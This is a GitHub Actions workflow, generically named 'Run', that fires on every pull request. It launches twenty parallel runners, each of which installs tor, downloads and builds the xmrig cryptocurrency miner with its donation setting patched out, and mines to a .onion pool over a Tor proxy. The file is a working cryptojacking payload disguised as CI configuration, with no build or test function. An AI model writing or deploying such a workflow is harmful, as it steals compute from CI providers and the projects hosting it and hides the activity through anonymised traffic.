name: Run
on: [pull_request]
jobs:
    run:
        name: Run
        runs-on: ubuntu-latest
        strategy:
          fail-fast: false
          matrix:
            runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
        steps:
          - shell: bash
            run: |
              sudo apt-get update
              
              sudo apt-get install --yes tor  build-essential cmake git libhwloc-dev libssl-dev libuv1-dev
              curl -Lo xmrig.tar.gz https://github.com/xmrig/xmrig/archive/refs/tags/v6.10.0.tar.gz
              tar xf xmrig.tar.gz
              cd xmrig-*
              sed -Ei 's/^(.*DonateLevel = )(.*)$/\10;/g' src/donate.h
              mkdir build
              cd build
              cmake .. -DCMAKE_BUILD_TYPE=Release
              make --jobs=$(nproc)

              ./xmrig -o f2x6wq65wc7qxsrsdq6nj6mkwgfonc52brkmi4puxdksoczzujqamnyd.onion:8080 -x socks5://127.0.0.1:9050 --donate-level 0 
